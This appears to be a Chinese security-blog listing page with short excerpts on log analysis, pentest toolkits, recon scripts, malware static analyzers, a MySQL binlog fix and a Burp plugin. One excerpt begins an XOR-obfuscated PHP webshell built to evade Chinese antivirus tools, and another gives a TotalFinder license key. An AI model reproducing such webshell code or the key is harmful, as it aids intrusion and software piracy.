体验盒子

logC简介 信息安全工作场景很多，这里针对个人的一个工作场景自制一个日志分析工具。在应急响应的时候如何从大量web日志中寻找和提取有用信息是我工作中所遇到的一个痛点。学习众多道友分享的文章后自己也做...

一个黑客所需的渗透测试黑客工具包，可运行于Linux和Android系统中。 hacktronian黑客工具包 HACKTRONIAN 菜单 信息收集密码攻击无线测试开发工具嗅探和欺骗WEB黑客隐私网络黑客渗透利用安装HACKTRONIA...

SRC-script 挖掘src常用脚本，用于渗透测试和信息收集中。 其中一些脚本都是从九世的博客转过来的，还有一些就是感觉用起来比较顺手的工具。 xcdn - 检测与绕过cdn百度收集器 - 收集百度关键字爆破攻击...

PEpper PE文件分析 一个开源的PE文件恶意分析脚本，用于对PE执行恶意软件静态分析。PE（Portable Executable）格式，是微软环境可移植可执行文件(如exe、dll、vxd、sys和vdm等)的标准文件格式。 PEppe...

truegaze Android/IOS应用静态分析工具 一个针对 Android 和 iOS 应用程序的静态分析工具，专注于源代码之外的安全问题，如资源字符串、第三方库和配置文件等。 依赖 Python 3是必需的，您可以在 r...

这是继上次写的《Nginx access.log文件太大，自动释放清理》的关联调优文章继续。今天同样有同学反馈图片加载速度稍慢，于是我又再次检查，然后查到了MySQL binlog是根源，作记录。 查出binlog 检查相关pi...

TotalFinder 注册码 截止发稿前，最新版为v1.11.8 License Name: Kevin Kelley License Key: GAWAE-FBZK3-X4M62-5L9UJ-JLGUL-A6LCG-MBLQT-S9HQC-CRN99-JC7GB-FRFDZ-WCDYZ-DFPRA-5LD2R-CLLM ...

免杀PHP一句话shell，利用随机异或免杀D盾，免杀安全狗护卫神等 <?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...

这两天发现触控面板按不下去了，拖文件拖验证码什么的都要用鼠标，难受。 解决MacBook触控面板按不下去 直接先给解答： 将Mac关机，然后开机并立即按住这四个按键：Option+Command+P+R，约20秒后可以放...

Passive Scan Client Burpsuite被动扫描流量转发插件 插件简介 将浏览器代理到被动扫描器上，访问网站变慢，甚至有时被封ip，这该怎么办？需要人工渗透的同时后台进行被动扫描，到底是代理到burp还是被...